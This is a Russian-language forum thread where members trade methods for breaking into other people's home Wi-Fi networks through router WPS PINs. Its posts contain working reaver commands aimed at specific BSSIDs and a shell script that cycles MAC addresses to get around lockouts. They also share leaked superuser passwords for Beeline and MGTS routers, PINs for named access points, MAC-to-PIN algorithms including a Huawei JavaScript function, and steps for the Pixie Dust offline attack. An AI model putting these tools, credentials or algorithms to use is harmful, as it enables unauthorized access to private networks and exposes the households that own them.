4KTQN3AK

TN8DZJ2Q

6NBYVMR3

LC9V6P3N

ZD3VA81Z

,как видите никакой последовательности нет,буквы и цифры расположены хаотично,подобрать такой пароль нереально....wps на них включен (правда после 10 пинов лочится до перезагрузки хозяином),про возможный алгоритм генерации пинов тоже ничего не известно.....только что попробовал reaverом подобрать пин для одного такого серкома,добавил ключ -r 4:600 (то есть после перебора 4 пинов ривер останавливался на целых 10 минут) и все равно после перебора 10 пинов посыпались сообщения о локах,видимо эта модель не забывает о количестве втюханных ей пинов и после 10 пинов обязательно следует лок,хоть ты паузу в 3 часа выставляй.... здесь предлагали после каждого пина менять mac,я этого не делал...да и не совсем понятно,как это сделать,не будешь же ты вручную менять мак после каждого протестированного пина,хотя может есть какие-то другие способы...если кто знает,пожалуйста подскажите,обязательно проверю

binarymaster
03.11.2014, 02:52
macchanger вроде же может инкрементить MAC или менять на рандомный.

binarymaster
13.11.2014, 01:59
Подскажите пин вот на такую штуку:

BSSID: D4:21:22:48:EF:46

ESSID: MGTS_GPON_8738

QSS показывает, что модель устройства - Sercomm RV6688BCM.

Пин путём 16 в 10 не подошёл, девайс пока не залочился.

VladimirV
13.11.2014, 11:52
Зависимости DSSID и PIN найденные мной.

пример:


00:07:26:3E:FC:C5 1662149 -2465792 D-Link DIR-300
00:07:26:41:3F:42 1810242 -2465792 D-Link DIR-300
00:07:26:4A:AA:48 2427464 -2465792 D-Link DIR-300
00:07:26:5F:C8:81 3811457 -2465792 D-Link DIR-300
00:0B:2B:35:A8:0B 3516427 0 ASUS RT-G32
00:0C:43:30:50:58 3166296 0 Upvel UR-312N4G Router
00:0C:43:30:50:88 1234567 =1234567 ASUS RT-N10 Rev.B1

Пины без контрольной суммы!

http://rghost.ru/private/59038448/9ddae6a65c34e05bab65914f814c2913

PASS:мой ник

Вот еще NETGEAR JWNR2000v2


4C:60:DE:E35D1E 2234483 -12666027
4C:60:DE:E38D72 2236695 -12676187
4C:60:DE:E3A4AC 2237686 -12681142
4C:60:DE:E73EE1 2243273 -12911640

Но у меня их мало чтоб найти зависимость!

asdm
13.11.2014, 18:16
Подскажите пин вот на такую штуку:

BSSID: D4:21:22:48:EF:46

ESSID: MGTS_GPON_8738

QSS показывает, что модель устройства - Sercomm RV6688BCM.

Пин путём 16 в 10 не подошёл, девайс пока не залочился.



пароль все равно не подберешь,можно только попробовать перебрать пины,меняя mac каждую попытку,можно еще вдобавок добавить ключ -r:r,хотя скорее всего толку от этого нет...(сам не проверял,т.к все уже давным давно залочено)

вот скрипт от пользователя 4pips:

#!/bin/sh

while true;

do

# echo Changing Mac Address to random Mac Address...;

ifconfig mon0 down;

ifconfig wlan0 down;

sleep 1;

macchanger -r mon0;

sleep 1;

macchanger -r wlan0;

sleep 1;

ifconfig wlan0 up;

ifconfig mon0 up;

echo Mac Address Changed and interface is up!;

echo Start reaver;

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -s /mnt/sdb1/XXXXXXXXXXXX.wpc -g 1 -L -vv;

sleep 2;

done;

Vikhedgehog
13.11.2014, 19:15
Зависимости DSSID и PIN найденные мной.

пример:



Есть пара мак/пин от D-Link DAP-1360/D1

00:07:26:4E:90:7D

2683005

Сработал тот же алгоритм что у DIR-300. Похоже, он на всех новых dlink'ах одинаковый. Правда есть пара проблем:

Во первых, по умолчанию WPS отключен на новых моделях. Вряд ли кто из обычных пользователей будет его врубать.

Во вторых, на этом роутере даже после включения WPS, точка не выдавала пароль на указанный пин код. Полностью ривер по нему еще не прогонял, так что некоторые вопросы еще есть.

VladimirV
13.11.2014, 21:51
Есть пара мак/пин от D-Link DAP-1360/D1

00:07:26:4E:90:7D

2683005

Сработал тот же алгоритм что у DIR-300. Похоже, он на всех новых dlink'ах одинаковый. Правда есть пара проблем:

Во первых, по умолчанию WPS отключен на новых моделях. Вряд ли кто из обычных пользователей будет его врубать.

Во вторых, на этом роутере даже после включения WPS, точка не выдавала пароль на указанный пин код. Полностью ривер по нему еще не прогонял, так что некоторые вопросы еще есть.



Новые Dlink проблемные!

Я включал WPS после подбора пароля на Huawei HG232f

Грабитель
14.11.2014, 09:15
Есть одна непонятная для меня вещь, допустим я выбрал точку доступа чтобы перебирать пин к ней и получить пароль, к примеру точка называется My WIFI

запускаю с такими параметрами: reaver -i mon0 -с 5 -b [мак адрес] -vv

Указываю канал, мак адрес точки которую хочу вскрыть, и -vv для полной отчетности.

Уже в пятый раз (на разных разумеется точках) сталкиваюсь с такой вещью, когда пин код успешно подобрался, на выходе я получаю нечто подобное:

[+] WPS PIN: '18623842'

[+] WPA PSK: 'E4EBFF20EFF0E8ECE5F0E0203132333435363738393031323 3343536373839FA'

[+] AP SSID: 'Network-0FE4EBFF20EFF0E8ECE5F0E0 '

Естественно пароль не подходит к точке My WIFI, а саму точку с названием Network-0FE4EBFF20EFF0E8ECE5F0E0 я нигде не встречаю, оно всплывает после перебора пароля, в других местах его нету и оно не вещает разумеется.

Даже если подключаться по указанному SSID с указанным паролем, то всё равно не удаётся это сделать... Причем это неоднократно у меня на разных точках, и получается их сбрутить не получится?

VladimirV
14.11.2014, 10:08
Есть одна непонятная для меня вещь, допустим я выбрал точку доступа чтобы перебирать пин к ней и получить пароль, к примеру точка называется My WIFI

запускаю с такими параметрами: reaver -i mon0 -с 5 -b [мак адрес] -vv

Указываю канал, мак адрес точки которую хочу вскрыть, и -vv для полной отчетности.

Уже в пятый раз (на разных разумеется точках) сталкиваюсь с такой вещью, когда пин код успешно подобрался, на выходе я получаю нечто подобное:

[+] WPS PIN: '18623842'

[+] WPA PSK: 'E4EBFF20EFF0E8ECE5F0E0203132333435363738393031323 3343536373839FA'

[+] AP SSID: 'Network-0FE4EBFF20EFF0E8ECE5F0E0 '

Естественно пароль не подходит к точке My WIFI, а саму точку с названием Network-0FE4EBFF20EFF0E8ECE5F0E0 я нигде не встречаю, оно всплывает после перебора пароля, в других местах его нету и оно не вещает разумеется.

Даже если подключаться по указанному SSID с указанным паролем, то всё равно не удаётся это сделать... Причем это неоднократно у меня на разных точках, и получается их сбрутить не получится?



В таком случае можно подключаться по пину.

У TPlink есть утилита QSS.

4pips
14.11.2014, 10:39
...

Уже в пятый раз (на разных разумеется точках) сталкиваюсь с такой вещью, когда пин код успешно подобрался, на выходе я получаю нечто подобное:

[+] WPS PIN: '18623842'

[+] WPA PSK: 'E4EBFF20EFF0E8ECE5F0E0203132333435363738393031323 3343536373839FA'

[+] AP SSID: 'Network-0FE4EBFF20EFF0E8ECE5F0E0 '

...



Такие название точки и пароль появляются тогда, когда точка заглючила. Это точно бывает при попытке подключиться к ней по пину, ну или по каким-то другим причинам, на то он и глюк. Из моего опыта так ведут себя Zyxel. Пока хозяин не перезагрузит точку, ничего сделать нельзя.

binarymaster
16.11.2014, 17:21
Сегодня удалось добыть немного инфы по роутеру Sercomm RV6688BCM с образцами данных.

BSSID: 00:0E:8F:64:4E:FC

ESSID: MGTS_GPON_1139

WPS: 29176076

Serial: 53434F4D10051139

Пароль на веб по умолчанию - admin:admin. Есть ещё супер учётка - mgts:mtsoao, её выдаёт веб интерфейс при переборе параметров, но логиниться по ней не даёт.

Веб интерфейс по структуре схож с уже упомянутым билайновским роутером, за исключением ребрендинга под МГТС, и его локальный IP-адрес 192.168.1.254.

Имя realm веб интерфейса: RV6688BCM (как в WPS).

Из минусов - он пока не распознаётся Router Scan'ом. Но это до поры до времени.

asdm
17.11.2014, 01:22
Сегодня удалось добыть немного инфы по роутеру Sercomm RV6688BCM с образцами данных.



4KTQN3AK

TN8DZJ2Q

6NBYVMR3

LC9V6P3N

ZD3VA81Z-все известные мне пароли на вафлю...



Из минусов - он пока не распознаётся Router Scan'ом.



как и beeline smartbox

binarymaster
17.11.2014, 01:27
4KTQN3AK

TN8DZJ2Q

6NBYVMR3

LC9V6P3N

ZD3VA81Z-все известные мне пароли на вафлю...



Интересуют не пароли, а выборка BSSID : ESSID : WPS PIN : Serial (опционально)



как и beeline smartbox



Beeline Smart Box распознаётся.

asdm
17.11.2014, 01:31
Интересуют не пароли, а выборка BSSID : ESSID : WPS PIN : Serial



могу только сказать bssid,essid и serial,wps пины не знаю



Beeline Smart Box распознаётся.



ни разу не видел... может подскажите диапозоны,где их можно обнаружить?

binarymaster
17.11.2014, 01:38
ни разу не видел... может подскажите диапозоны,где их можно обнаружить?



Нету их во внешке и локалке билайна, потому что веб морда у них по умолчанию закрыта извне. Открыть можно только используя супер учётку.

Но то, что их нельзя найти - это не повод утверждать, что оно не определяется

asdm
17.11.2014, 01:46
Открыть можно только используя супер учётку



таковая у него имеется? везде фигурирует admin/admin

binarymaster
17.11.2014, 03:51
таковая у него имеется? везде фигурирует admin/admin



Имеется.

SuperUser:Beeline$martB0x

Кстати, в эксплойтах Router Scan (их код открыт и включён в состав), всё это тоже можно увидеть.

asdm
17.11.2014, 18:18
веб морда у них по умолчанию закрыта извне. Открыть можно только используя супер учётку.



то есть,вставив SuperUser:Beeline$martB0x в файл auth_basic.txt можно будет увидеть smartboxы в router scanе?

binarymaster
18.11.2014, 01:25
то есть,вставив SuperUser:Beeline$martB0x в файл auth_basic.txt можно будет увидеть smartboxы в router scanе?



Нет.

Я вообще не понимаю, с чего у вас такие "догадки" возникают. Посмотрите исходный код, Smart Box не использует Basic Authentication, добавлять в словари смысла нет. И я уже написал причину, по которой их сложно найти в природе...

asdm
18.11.2014, 19:31
Нет.






Beeline Smart Box распознаётся.



что значит "распознаётся"?

binarymaster
19.11.2014, 02:01
что значит "распознаётся"?



В данном контексте я имел ввиду, что полностью поддерживается. Если такой роутер вам попадётся, то Router Scan его полностью отпарсит.



Нету их во внешке и локалке билайна, потому что веб морда у них по умолчанию закрыта извне. Открыть можно только используя супер учётку.



А под этим я имел ввиду, что имея доступ к этому роутеру, и зайдя при помощи супер учётки, можно разрешить доступ из WAN в веб интерфейс. Но опять же, простым пользователям невдомёк, что существует учётка выше админа.

Vikhedgehog
19.11.2014, 23:19
Нашел интересный пост на хабре, где говорится, что хакерам удалось получить доступ к файловой системе ASUS RT-AC66U (A2) при помощи дыры в прошивке. Так же говорится что есть доступ к файлам, отвечающим за работу WPS.

"Другой интересной криптографической разминкой может быть разбор алгоритма для генерации WPS PIN-а устройства. Вы можете получить текущий PIN и secret_code, выполнив команду nvram show | grep -E secret_code|wps_device_pin". Поищите эти значения в исходном коде и используйте полученную информацию для написания кейгена"

http://i.imgur.com/jVoTDgJ.png

Насколько я понял, пин код генерируется при помощи некого "секретного кода", который уникален для каждого роутера asus. На изображении можно по //комментарию определить, что этот отрывок участвует в генерации этого кода.

Пост на хабре: http://habrahabr.ru/post/230469/

Было бы интересно сделать скрипт для асусов

Stranger@
20.11.2014, 12:28
Wi-Fi ноутбука видит сеть TD-W8961ND мас:E8-DE-27-DA-CA-70, SSID:Home-WiFi ,при попытке присоединения, просит ввести пароль или нажать кнопку на маршрутизаторе, просканировал сети программой WifiInfoView,

программа показала что WPS настроен, но ни BTR 5,ни airslax ни показали наличие WPS у данной точки, интересно в чём причина?

Грабитель
20.11.2014, 13:57
Wi-Fi ноутбука видит сеть TD-W8961ND мас:E8-DE-27-DA-CA-70, SSID:Home-WiFi ,при попытке присоединения, просит ввести пароль или нажать кнопку на маршрутизаторе, просканировал сети программой WifiInfoView,

программа показала что WPS настроен, но ни BTR 5,ни airslax ни показали наличие WPS у данной точки, интересно в чём причина?



К примеру у меня софтина wash вообще неверные значения показывает, да и wifite тоже бывает со сбоями. Тут самый верный способ не проверять есть ли WPS или нет, а пытаться ломануть, получится или нет, там уж видно, поэтому лучше всего запустить reaver и побрутить.

PSYDRUGS
20.11.2014, 15:20
Благодаря помощи по вскрытия хендшейка, привожу дефолтное значение PIN для роутера: TP-LINK WR841N MAC 64:70:02:96:27:EC PIN: 11642831.

В настройках роутера WPS Status: enabled, но не активен для устройств (Disable PIN of this device), нужно снять галочку, для его активации.

PSYDRUGS
20.11.2014, 17:39
Посмотрите пожалуйста PIN для ZyXEL: EC:43:F6B:70:EB.

asdm
20.11.2014, 17:41
Посмотрите пожалуйста PIN для ZyXEL: EC:43:F6B:70:EB.



14184683

Stranger@
20.11.2014, 17:51
Сообщение от Stranger@

Wi-Fi ноутбука видит сеть TD-W8961ND мас:E8-DE-27-DA-CA-70, SSID:Home-WiFi ,при попытке присоединения, просит ввести пароль или нажать кнопку на маршрутизаторе, просканировал сети программой WifiInfoView,

программа показала что WPS настроен, но ни BTR 5,ни airslax ни показали наличие WPS у данной точки, интересно в чём причина?



К примеру у меня софтина wash вообще неверные значения показывает, да и wifite тоже бывает со сбоями. Тут самый верный способ не проверять есть ли WPS или нет, а пытаться ломануть, получится или нет, там уж видно, поэтому лучше всего запустить reaver и побрутить.



Пробовал, reaver не брутит.

4pips
20.11.2014, 18:28
Посмотрите пожалуйста PIN для ZyXEL: EC:43:F6B:70:EB.



4381291 в ривер, а 8-ю цифру он сам автоматически подставит.

binarymaster
21.11.2014, 12:12
Насколько я понял, пин код генерируется при помощи некого "секретного кода", который уникален для каждого роутера asus. На изображении можно по //комментарию определить, что этот отрывок участвует в генерации этого кода.

Пост на хабре: http://habrahabr.ru/post/230469/

Было бы интересно сделать скрипт для асусов


Давно читал этот пост на хабре, интересная пища для размышления. Но решения так и не нашёл

Algierd
30.11.2014, 15:40
Роутер ZTE CC:7B:35:15:F5:78 на пине 04819981 ривер подвис на 99.99%. Попробовал второй раз запустить атаку прогнал все 11 тысяч пинов и выдал ошибку восстановления wpa-ключа. Есть ли какие-то варианты в этом случае? Хотел было прогнать с помощью bully, но тне смог им подключится к точке доступа. Как им правильно пользоватся?

SlNik
30.11.2014, 18:12
Роутер ZTE CC:7B:35:15:F5:78 на пине 04819981 ривер подвис на 99.99%. Попробовал второй раз запустить атаку прогнал все 11 тысяч пинов и выдал ошибку восстановления wpa-ключа. Есть ли какие-то варианты в этом случае? Хотел было прогнать с помощью bully, но тне смог им подключится к точке доступа. Как им правильно пользоватся?



Попробуй прогнать через ривер 1.3

reaver-1.3 -i mon0 -b CC:7B:35:15:F5:78 -vv

bully далеко не ко всем точкам подключается.

Algierd
01.12.2014, 04:30
Попробуй прогнать через ривер 1.3

reaver-1.3 -i mon0 -b CC:7B:35:15:F5:78 -vv

bully далеко не ко всем точкам подключается.



Попробовал. Ривером 1.3 перебрать больше 1-2% так и не удалось на этой ТД. Пины вроде перебираются, но идут Warning: Receive Timeout occurred, потом была надпись Warning: Last message not processed properly reverting state to previous message. Warning: out of order received re-transmitting last message. В итоге перебор пинов остановился и стали бежать постоянные Warning: Receive Timeout occurred. С bully так толком не разобрался, пробовал 2 скрипта к нему из wifislax, но они не смогли подключится и начать перебор выдавая error. При том, что уровень сигнала там отличный -55-57dBm... Жаль терять этот роутер, может есть какие-то ещё варианты действий?

Vikhedgehog
04.12.2014, 15:38
Добрый день,

Хочу сообщить, что в WPS нашли новую дыру, однако это касается только устройств с чипсетом broadcom. Такие встроены в роутеры asus на сколько знаю Есть предположения, что уязвимы и другие точки доступа с другими чипсетами в первые секунды после загрузки системы.

Источник: http://www.slideshare.net/0xcite/offline-bruteforce-attack-on-wifi-protected-setup

Даже есть какой-то алгоритм, ток я ничего не понял)


int rand_r( unsigned int *seed ) { unsigned int s=*seed; unsigned int uret; s = (s * 1103515245) + 12345; // permutate seed uret = s & 0xffe00000;// Only use top 11 bits s = (s * 1103515245) + 12345; // permutate seed uret += (s & 0xfffc0000) >> 11;// Only use top 14 bits s = (s * 1103515245) + 12345; // permutate seed uret += (s & 0xfe000000) >> (11+14);// Only use top 7 bits retval = (int)(uret & RAND_MAX); *seed = s; return retval; }

binarymaster
04.12.2014, 16:21
Даже есть какой-то алгоритм, ток я ничего не понял)



Это алгоритм ГПСЧ из какого-то роутера какого-то производителя

За ссылку спасибо, идея действительно очень интересная!

Более менее простым языком суть описана на слайде 15:

1. Получаем пакет M3 от точки доступа, подбирая 1 пин

2. Считываем значение Nonce из пакета M1

3. Брутфорсим состояние ГПСЧ

4. Вычисляем значения E-S1 и E-S2, используя полученное состояние ГПСЧ

5. Дешифруем E-Hash1 и E-Hash2

6. Брутфорсим первую и вторую часть пина

7. ...

8. PROFIT!!!

Vikhedgehog
04.12.2014, 22:58
Решил попробовать разобраться. Проверил пин код 12345670 на точке асус, одновременно перехватывая трафик с wireshark, выбрал пакет М1, значение Enrollee Nonce: 6b:47:74:67:d0:1e:a0:62:e8:a7:f3:7b:df:61:eb:f5

В М3 - Enrollee hash 1: 09:e7:39:23:0c:90:b7:84:45:cd:32:88:b8:71:ef:eb:6a :af:de:bd:36:57:5d:64:37:46:90:be:f9:2c:df:51

Enrollee hash 2: 9d:60:c2:01:5e:00:52:33:66:65:3c:3d:20:5a:cc:be:d5 :ed:59:ea:5c:2f:a1:c4:96:c3:65:bf:65:a7:68:a1

С состоянием ГПСЧ чего-то не понял как его вычислять по этой формуле на практике, может кто нибудь разобрался? Вроде бы выше упомянутый алгоритм един для всех устройств на чипсете broadcom.

kosmaty
05.12.2014, 13:23
Это алгоритм ГПСЧ из какого-то роутера какого-то производителя

За ссылку спасибо, идея действительно очень интересная!

Более менее простым языком суть описана на слайде 15:

1. Получаем пакет M3 от точки доступа, подбирая 1 пин

2. Считываем значение Nonce из пакета M1

3. Брутфорсим состояние ГПСЧ

4. Вычисляем значения E-S1 и E-S2, используя полученное состояние ГПСЧ

5. Дешифруем E-Hash1 и E-Hash2

6. Брутфорсим первую и вторую часть пина

7. ...

8. PROFIT!!!



Ну, с переводом разобрались, а технически как это проделать?

1. Брутим ГПСЧ - как/чем?

2. Вычисляем значения E-S1/E-S2 - как/чем?

3. Дишифровка хешей - как/чем?

Остальное уже более-менее понятно, но до него еще надо дойти. Может кто-то толково объяснить, какими инструментами выполнить эти вычисления?

binarymaster
05.12.2014, 15:18
Ну, с переводом разобрались, а технически как это проделать?

1. Брутим ГПСЧ - как/чем?



Здесь во-первых надо определиться с алгоритмом ГПСЧ, он может быть разным. Под брутом состояния, как я понял, имеется ввиду получение той же последовательности случайных чисел, что сгенерировал роутер для значения Nonce. Когда нам удалось получить ту же цепочку, мы знаем состояние генератора.



2. Вычисляем значения E-S1/E-S2 - как/чем?

3. Дишифровка хешей - как/чем?



Здесь необходимо обратиться к документации протокола WPS, в котором есть функции вычисления. В этих же функциях будет использоваться наш ГПСЧ с нужным состоянием.



Может кто-то толково объяснить, какими инструментами выполнить эти вычисления?



Я полагаю, готовых инструментов пока нет.

Если прикинуть, нужен будет инструмент, состоящий из двух модулей:

1. Сетевой модуль (получатель/парсер пакетов)

2. Криптографический модуль (генератор/брутфорсер)

Может быть кто-то осилит написание сего на питоне, будем надеяться.

TOX1C
05.12.2014, 16:37
Насколько я понял всю эту канитель, генератор псевдослучайных чисел использует в качестве входных данных пин код wps? И в этом заключается уязвимость?

VladimirV
05.12.2014, 20:40
Полный перебор 32 бит

http://rghost.ru/59440076/image.png

VladimirV
05.12.2014, 20:56
Насколько я понял всю эту канитель, генератор псевдослучайных чисел использует в качестве входных данных пин код wps? И в этом заключается уязвимость?



Нет конечною.

Этот генератор работает с момента запуска роутера.

Просто после перезапуска генератор стартует с нуля.

TOX1C
05.12.2014, 22:38
То есть, при раскрутке текущего значения в генератое, у нас появляется возможность прокрутить процесс подбора пинка без участия точки доступа, да?

пысы: может кто кинуть ликбез по тому, как работает впс, и на каком шаге там появляется зашифрованный пин-код, а то я не врубаюсь немного.

VladimirV
05.12.2014, 23:06
То есть, при раскрутке текущего значения в генератое, у нас появляется возможность прокрутить процесс подбора пинка без участия точки доступа, да?



Да. По сути мы должны получить текущий пин а с помощью него PASS.


12. a) Отловить в WPS протоколе сообщения 'M1', 'M2', 'M3'.
b) Получаем 'Nonce' из M1.
c) Подбираем состояние ПГСЧ.
d) Вычисляем состояние E-S1 и E-S2.
e) Расшифровать E-hash1 и E-hash2.
f) Подобрать Pin1 и PIN2.
g) Получить пароль с помощью WPS протокола.

TOX1C
06.12.2014, 00:09
c) Подбираем состояние ПГСЧ.



Вот на этом хотелось бы поподробнее. На предыдущей странице был код генератора, для начала с ним бы разобраться. Что он делает с входящими данными, какие именно входящие данные используются (время в юникс формате / количество тактов процессора / стихи матерных песен группы красная плесень / линейные числа ? ), что делается с данными на выходе.

И самое главное - где используется

VladimirV
06.12.2014, 00:38
Вот на этом хотелось бы поподробнее



1: Что он делает с входящими данными

2: Какие именно входящие данные используются

3: Что делается с данными на выходе.

1 - Генерирует псевдо-случайное число.

2 - $00000000 - $FFFFFFFF (32 бита). После перезапуска роутера все начинается с $00000000. На картинке выше я показал что из 128 битового числа совпадения прошли только по 32 старшим битам после полного перебора 32 бит.

3 - наверно использовать для дешифрования.

P.S. Брут 32 бит на Phenom II X64 в один поток занимает 10-20 секунд.

binarymaster
06.12.2014, 20:09
Основная сложность здесь не столько в бруте, сколько в поиске нужного алгоритма для нужного роутера, а также вовремя поймать нужные пакеты...

Залоченные роутеры в этом плане не подходят.

Vikhedgehog
07.12.2014, 01:45
Основная сложность здесь не столько в бруте, сколько в поиске нужного алгоритма для нужного роутера, а также вовремя поймать нужные пакеты...

Залоченные роутеры в этом плане не подходят.


Так вроде же у роутеров с одинаковым чипсетом одинаковый стандартный алгоритм? Например у роутеров с чипсетом Ralink алгоритм hex-2-dec (zyxel, asus rt-g32). А в данном случае выложили алгоритм для роутеров на чипе broadcom.

TOX1C
07.12.2014, 15:01
Это алгоритм генерации пинка или генерации псевдослучайных чисел? Не надо мух с котлетами мешать. Алго ГПСЧ можно вытащить, просто разобрав прошивку декомпилятором, и воссоздав код. При большем везении можно найти и генератор пин-кодов на основе мак-адреса. Но я что-то сомневаюсь, что на ачате есть люди, которым это под силу.

binarymaster
07.12.2014, 17:00
Так вроде же у роутеров с одинаковым чипсетом одинаковый стандартный алгоритм? Например у роутеров с чипсетом Ralink алгоритм hex-2-dec (zyxel, asus rt-g32). А в данном случае выложили алгоритм для роутеров на чипе broadcom.



Не-не, та презентация объясняет не алгоритм генерации пин кода устройства, а уязвимость ГПСЧ, позволяющая брутить пин код в оффлайн режиме, используя криптографические особенности протокола.



Это алгоритм генерации пинка или генерации псевдослучайных чисел? Не надо мух с котлетами мешать.



Второе. Именно)



Алго ГПСЧ можно вытащить, просто разобрав прошивку декомпилятором, и воссоздав код.



Именно, чипсет здесь в общем-то не при чём. А декомпилировать не всегда нужно, многие прошивки открыты (хотя некоторые лишь частично).



При большем везении можно найти и генератор пин-кодов на основе мак-адреса. Но я что-то сомневаюсь, что на ачате есть люди, которым это под силу.



Где-то здесь в этом треде или по близости мы это уже обсуждали, и даже пытались что-то найти.

lom1989
13.12.2014, 15:47
Всем привет,пользовался airslax(reaver) и вот что получилось

WPS PIN 00000000

WPA PSK 1ysa3pjdys20hfhr420 ur9nkicur1j

AP SID SEC linkshare 861903

По даному паролю подключать не хочет,может его надо перевести по какомуто алгоитму?

Algierd
13.12.2014, 16:00
Существует ли сейчас рабочий метод возвращения роутера из wps-блокировки? mdk3 уже не помогает, а всяких tp-link'ов вокруг дофига...

comporg
13.12.2014, 16:55
Всем привет,пользовался airslax(reaver) и вот что получилось

WPS PIN 00000000

WPA PSK 1ysa3pjdys20hfhr420 ur9nkicur1j

AP SID SEC linkshare 861903

По даному паролю подключать не хочет,может его надо перевести по какомуто алгоитму?



Подключайся по пину...

binarymaster
14.12.2014, 04:18
А я вот нашёл алгоритм генерации пин кода из MAC-адреса для роутера Huawei HG8245H.

Обнаружил его в коде веб интерфейса, он на JavaScript

Пример использования:

computeDefaultPin('20:0B:C7:C9:6E:94')

[CODE]
// According to wlanmac, calculate initial PIN code, algorithm HW_WLAN_CalWpsDefaultPin is the same
function computeDefaultPin(wlanMac)
{
var mac = '';
var temp = 0;
var macnum = 0;
var pin = 0;
var defaultpin = 0;

// Check wlanmac legitimacy
if ((wlanMac == '') || (wlanMac == '00:00:00:00:00:00') || (wlanMac == 'FF:FF:FF:FF:FF:FF'))
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}

// Remove : symbols from wlanmac
for (var i = 0; i = (mac.length - 7); j--)
{
temp = parseInt(mac.charCodeAt(j));

if ((temp >= 97) && (temp = 65) && (temp = 48) && (temp

Vikhedgehog
14.12.2014, 14:52
А я вот нашёл алгоритм генерации пин кода из MAC-адреса для роутера Huawei HG8245H.

Обнаружил его в коде веб интерфейса, он на JavaScript

Пример использования:

computeDefaultPin('20:0B:C7:C9:6E:94')


// According to wlanmac, calculate initial PIN code, algorithm HW_WLAN_CalWpsDefaultPin is the same
function computeDefaultPin(wlanMac)
{
var mac = '';
var temp = 0;
var macnum = 0;
var pin = 0;
var defaultpin = 0;

// Check wlanmac legitimacy
if ((wlanMac == '') || (wlanMac == '00:00:00:00:00:00') || (wlanMac == 'FF:FF:FF:FF:FF:FF'))
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}

// Remove : symbols from wlanmac
for (var i = 0; i < wlanMac.length; )
{
mac += wlanMac.substr(i,2);
i += 3;
}

// Take wlanmac after 7 bits and convert it to 10 hexadecimal
for (var j = (mac.length - 1); j >= (mac.length - 7); j--)
{
temp = parseInt(mac.charCodeAt(j));

if ((temp >= 97) && (temp <= 102)) //abcdef
{
temp = (temp - 97) + 10;
}
else if ((temp >= 65) && (temp <= 70)) //ABCDEF
{
temp = (temp - 65) + 10;
}
else if ((temp >= 48) && (temp <= 57)) //0123456789
{
temp = temp - 48;
}
else
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}

temp = temp * Math.pow(16, mac.length - j - 1);
macnum += temp;
}

pin = macnum % 10000000;
if (pin == 0)
{
pin = 1234567;
}

// Add checksum
defaultpin = pin * 10 + ComputeChecksum(pin);

return defaultpin;
}



Круто, в инете прочел, что такие роутеры ставит МГТС для своего GPON. Странно, что у меня в округе только sercomm и intercross.

asdm
14.12.2014, 16:03
Круто, в инете прочел, что такие роутеры ставит МГТС для своего GPON. Странно, что у меня в округе только sercomm и intercross.



его ставили в 2012-2013,потом ему на смену пришел серком....

http://www.mgts.ru/upload/images/f/1/home/internet/equipment/modems/Huawei HG8245.pdf

VladimirV
25.12.2014, 01:21
Делаем скрипт выше на калькуляторе!

Имеем BSSID - F8:4A:BF:E1:08:EC

Открываем калькулятор и выбираем вид - программист.

Выбираем HEX. Ставим 4 или 8 байт. Вводим FE108EC.

Выбираем DEC. Жмем кнопку 'Mod' вводим с клавиатуры 10 000 000 (без пробелов) и жмем 'Enter' - Готово!

http://i67.fastpic.ru/thumb/2014/1225/aa/02dc287fb71a110d108da1249cfb0baa.jpeg http://i67.fastpic.ru/thumb/2014/1225/8e/b69a5dcd011527bdc88a1ab4ba02978e.jpeg http://i67.fastpic.ru/thumb/2014/1225/1e/4174015cbd9307e4fd9c706d053c6b1e.jpeg http://i67.fastpic.ru/thumb/2014/1225/d1/eebfdf00acc30c50c4558e94e58cc3d1.jpeg

P.S. для BSSID 90:94:E4:F0:3B:F0 с пином 5743984 делаем тоже-самое но с F03BF0!

RomanxD
25.12.2014, 07:30
Алгоритм генерации пин кода, к некоторым роутерам D-Link.

http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

VladimirV
25.12.2014, 10:44
Алгоритм генерации пин кода, к некоторым роутерам D-Link.

http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/



Работает. Спасибо.

Те что подошли у меня.

BSSID


00:01:23:45:XX:XX 00:14:D1:60:XX:XX 00:14:D1:6E:XX:XX
00:14:D1:E1:XX:XX 00:14:D1:E6:XX:XX 00:18:E7:C4:XX:XX
00:18:E7:C8:XX:XX 00:18:E7:D0:XX:XX 00:18:E7:D2:XX:XX
00:18:E7:E1:XX:XX 00:18:E7:E3:XX:XX 00:18:E7:E4:XX:XX
00:18:E7:E6:XX:XX 00:18:E7:E8:XX:XX 00:18:E7:EA:XX:XX
00:18:E7:EC:XX:XX 00:18:E7:ED:XX:XX 00:18:E7:EE:XX:XX
00:18:E7:EF:XX:XX 00:18:E7:F0:XX:XX 00:18:E7:F1:XX:XX
00:18:E7:F2:XX:XX 00:18:E7:F3:XX:XX 00:18:E7:F4:XX:XX
00:18:E7:F7:XX:XX 00:18:E7:FA:XX:XX 00:18:E7:FC:XX:XX
00:18:E7:FD:XX:XX 00:18:E7:FE:XX:XX 00:19:5B:60:XX:XX
00:1C:F0:66:XX:XX 00:1C:F0:B8:XX:XX 00:1C:F0:F7:XX:XX
00:1E:58:00:XX:XX 00:1E:58:FB:XX:XX 00:21:91:08:XX:XX
00:21:91:0A:XX:XX 00:21:91:0D:XX:XX 00:21:91:14:XX:XX
00:21:91:18:XX:XX 00:21:91:D4:XX:XX 00:21:91:EE:XX:XX
00:21:91:F6:XX:XX 00:21:91:FE:XX:XX 00:22:B0:B2:XX:XX
00:22:B0:B3:XX:XX 00:22:B0:B4:XX:XX 00:22:B0:B5:XX:XX
00:24:01:28:XX:XX 00:24:01:2D:XX:XX 00:24:01:41:XX:XX
00:24:01:F1:XX:XX 00:26:5A:C3:XX:XX 00:26:5A:CC:XX:XX
00:26:5A:CF:XX:XX 00:26:5A:F5:XX:XX 00:26:5A:F9:XX:XX
00:98:98:98:XX:XX 14:D6:4D:2C:XX:XX 14:D6:4D:2D:XX:XX
14:D6:4D:2E:XX:XX 14:D6:4D:35:XX:XX 14:D6:4D:37:XX:XX
1C:7E:E5:31:XX:XX 1C:7E:E5:34:XX:XX 1C:7E:E5:38:XX:XX
1C:7E:E5:39:XX:XX 1C:7E:E5:3E:XX:XX 1C:7E:E5:40:XX:XX
1C:7E:E5:41:XX:XX 1C:7E:E5:43:XX:XX 1C:7E:E5:45:XX:XX
1C:7E:E5:4A:XX:XX 1C:7E:E5:4B:XX:XX 34:08:04:E0:XX:XX
